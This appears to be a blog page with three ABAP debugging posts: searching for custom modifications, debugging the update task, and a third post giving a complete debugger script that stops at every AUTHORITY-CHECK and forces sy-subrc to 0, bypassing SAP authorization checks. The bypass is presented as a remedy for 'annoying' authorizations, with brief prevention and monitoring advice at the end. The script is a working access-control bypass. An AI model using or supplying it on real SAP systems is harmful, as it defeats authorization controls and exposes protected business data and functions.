Category: Debug

ABAP debugger stop at modification

As ABAP developer you can be asked to help out with issues in standard SAP to help debug the issue.

First of all, you normally use the ANST tool to check if there are any standard SAP notes available.

The second step is to search for user-exits and BADI’s for a transaction.

The third step you can do is use the new ABAP debugger script to search for customer enhancements during debugging. To do this, load the new script by applying OSS note 3415810 – New ABAP Debugger Script RSTPDA_SCRIPT_MODIFICATION.

Now start debugging like usual and go to the Script tab:

Then load the script RSTPDA_SCRIPT_MODIFICATION:

Then start the script and choose your break-point stop conditions:

Now you can check if there is any modification or custom coding interfering with standard SAP.

When no custom coding involved and issues is still persisting, you can debug, but will still be forced to file a case at me.sap.com for an SAP solution.

Update process debugging

As ABAP developer you sometime need to update a piece of ABAP code that is part of the Update logic. To get debugging done there some more actions are required.

ABAP debugging should only be done by experienced ABAP developers who know the pros and cons of debugging in Update. If you are not experience enough, stop reading and let an experienced person do the job.

Update process debugging

First set your break point in the Z code or standard code that does the update. If you run the normal transaction, you will notice this break point will not be called.

Now start your normal transaction again. Go to debug mode.

Choose menu Settings and Change debugger profile / Settings:

Select Update Debugging and press Save.

In the main transaction go to the point where you are about to save the data. Before pressing the save button, key in /h for debug. Now press the save button. you jump to debug mode. Press F8 to continue the current session. Wait a few seconds, and the update debug will start now:

The update debug starts now. Now you can debug the ABAP logic used in the UPDATE task. Please notice in the debug screen you see you are doing the UPDATE process debug on top of the screen.

If you have set breakpoints before in the correct code then these are now active.

Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:

RSUSR003

Now we start the debugger with /h and goto the scripting tab:

Script page

In the coding block of the script load this block of coding:

 *<SCRIPT:PERSISTENT>


 *<SCRIPT:HEADER>
 *<SCRIPTNAME>ZBYPASS</SCRIPTNAME>
 *<SCRIPT_CLASS>LCL_DEBUGGER_SCRIPT</SCRIPT_CLASS>
 *<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>
 *<BP_REACHED>X</BP_REACHED>

 *</SCRIPT:HEADER>

 *<SCRIPT:PRESETTINGS>
 *<BP>
 *<FLAGACTIVE>X</FLAGACTIVE>
 *<KIND>1 </KIND>
 *<STATEMENTSTA>AUTHORITY-CHECK</STATEMENTSTA>
 *</BP>

 *</SCRIPT:PRESETTINGS>

 *<SCRIPT:SCRIPT_CLASS>
 *---------------------------------------------------------------------*
 *       CLASS lcl_debugger_script DEFINITION
 *---------------------------------------------------------------------*
 *
 *---------------------------------------------------------------------*
 CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

   PUBLIC SECTION.
     METHODS: prologue  REDEFINITION,
       init    REDEFINITION,
       script  REDEFINITION,
       end     REDEFINITION.

 ENDCLASS.                    "lcl_debugger_script DEFINITION
 *---------------------------------------------------------------------*
 *       CLASS lcl_debugger_script IMPLEMENTATION
 *---------------------------------------------------------------------*
 *
 *---------------------------------------------------------------------*
 CLASS lcl_debugger_script IMPLEMENTATION.
   METHOD prologue.
 *** generate abap_source (source handler for ABAP)
     super->prologue( ).
   ENDMETHOD.                    "prolog

   METHOD init.
 *** insert your initialization code here
   ENDMETHOD.                    "init
   METHOD script.

 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
 *Importing
 *        REFERENCE( P_NEW_VALUE ) TYPE STRING
 *        REFERENCE( P_OFFSET ) TYPE I
 *        REFERENCE( P_LENGTH ) TYPE I
 *        REFERENCE( P_VARNAME ) TYPE STRING
 ****************************************************************

 *************************************************
 * debugger commands (p_command):
 * Step into(F5)   -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_INTO
 * Execute(F6)     -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OVER
 * Return(F7)      -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OUT
 * Continue(F8)    -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_CONTINUE
 *************************************************
 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_DEBUGGER_CTRL / METHOD = DEBUG_STEP )
 *Importing
 *        REFERENCE( P_COMMAND ) TYPE I
 ****************************************************************

 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_ABAPDESCR / METHOD = LINE )
 *Returning
 *        VALUE( P_LINE ) TYPE I
 ****************************************************************

     TRY.
         CALL METHOD abap_source->line
           RECEIVING
             p_line = DATA(p_line).
       CATCH cx_tpda_src_info .
       CATCH cx_tpda_src_descr_invalidated .
     ENDTRY.

     TRY.
         CALL METHOD debugger_controller->debug_step
           EXPORTING
             p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
       CATCH cx_tpda_scr_rtctrl_status .
       CATCH cx_tpda_scr_rtctrl .
     ENDTRY.


 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
 *Importing
 *        REFERENCE( P_NEW_VALUE ) TYPE STRING
 *        REFERENCE( P_OFFSET ) TYPE I
 *        REFERENCE( P_LENGTH ) TYPE I
 *        REFERENCE( P_VARNAME ) TYPE STRING
 ****************************************************************

     TRY.
         CALL METHOD cl_tpda_script_data_descr=>change_value
           EXPORTING
             p_new_value = '0'
 *           p_offset    = -1
 *           p_length    = -1
             p_varname   = 'sy-subrc'.
       CATCH cx_tpda_varname .
       CATCH cx_tpda_scr_auth .
     ENDTRY.

   ENDMETHOD.                    "script
   METHOD end.
 *** insert your code which shall be executed at the end of the scripting (before trace is saved)
 *** here

   ENDMETHOD.                    "end
 ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION
 *</SCRIPT:SCRIPT_CLASS>

 *</SCRIPT:PERSISTENT>

Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:

Breakpoint

Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more then fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care: the coding of the script simple changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.

Prevention

If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.

See also OSS note 3226223 – How to monitor debug activities in SAP Netweaver.